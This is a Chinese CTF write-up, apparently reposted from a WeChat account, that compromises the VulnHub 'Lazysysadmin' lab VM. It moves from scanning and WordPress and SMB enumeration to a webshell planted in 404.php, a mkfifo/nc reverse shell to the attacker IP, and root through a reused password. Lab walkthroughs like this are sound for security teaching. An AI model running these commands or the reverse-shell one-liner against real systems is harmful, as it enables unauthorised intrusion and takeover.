Lazysysadmin

admin 2025年3月16日22:06:40评论4 views字数 1303阅读4分20秒阅读模式

下载地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

攻击者IP:192.168.232.129 nat vmare

受害者IP:192.168.232.134 nat vmare

主机发现

arp-scan -l

Lazysysadmin

端口扫描

nmap -p- -sV 192.168.232.134

Lazysysadmin

web页面是一个静态的html,没有可以点的

Lazysysadmin

Lazysysadmin

目录扫描

dirsearch -u http://192.168.232.134

Lazysysadmin

http://192.168.232.134/robots.txt

访问目录文件

http://192.168.232.134/info.php

Lazysysadmin

192.168.232.134/phpmyadmin

没弱口令,没空密码

Lazysysadmin

获得用户名togie

Lazysysadmin

http://192.168.232.134/wordpress/wp-login.php

Lazysysadmin

wpscan --url "http://192.168.232.134/wordpress/" -e u ,ap

获得两个用户名

admin

Admin

Lazysysadmin

密码没爆出来

wpscan --url "http://192.168.232.134/wordpress/" -U use.txt -P /root/top1000.txt 

Lazysysadmin

从其他端口下手

enum4linux -A 192.168.232.134 

发现可以使用空密码登录

Lazysysadmin

挂载目录到本地

mount -t cifs -o username=’’,password=’’ //192.168.232.134/share$ /mnt

该命令用于挂载一个CIFS(Common Internet File System,通用互联网文件系统)类型的网络共享到本地文件系统中。让我们逐一查看命令的组成部分:mount: 这是一个用于挂载文件系统的Unix命令。-t cifs: 这个选项告诉 mount 命令需要挂载的文件系统的类型是 cifs,即一个Windows共享。-o username=’’,password=’’: 这是 -o (选项)的一部分,用于传递文件系统选项。username=’’ 和 password=’’ 表示尝试用一个空的用户名和密码登录SMB/CIFS服务器。//192.168.123.206/share$: 这是你想要挂载的远程共享的网络路径。192.168.123.206 是文件服务器的IP地址,share$ 是远程上分享的名字。$ 通常表示该共享是隐藏的,所以不会在网络浏览列表中出现。/mnt: 这是本地系统上的挂载点,即远程共享文件系统内的文件和目录将会“显示”的位置。

找到一个密码12345

Lazysysadmin

wordpress发现wp-congig.php,获得账号密码

Admin/TogieMYSQL12345^^

Lazysysadmin

使用这个账号登录wp找到文件上传漏洞

Lazysysadmin

404.php插入一句话木马

Lazysysadmin

Lazysysadmin

Lazysysadmin

蚁剑反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.232.129 1111 >/tmp/f

Lazysysadmin

su togie

12345

sudo su

12345

Lazysysadmin

Lazysysadmin

原文始发于微信公众号(王之暴龙战神):Lazysysadmin

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月16日22:06:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Lazysysadminhttps://cn-sec.com/archives/3845048.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息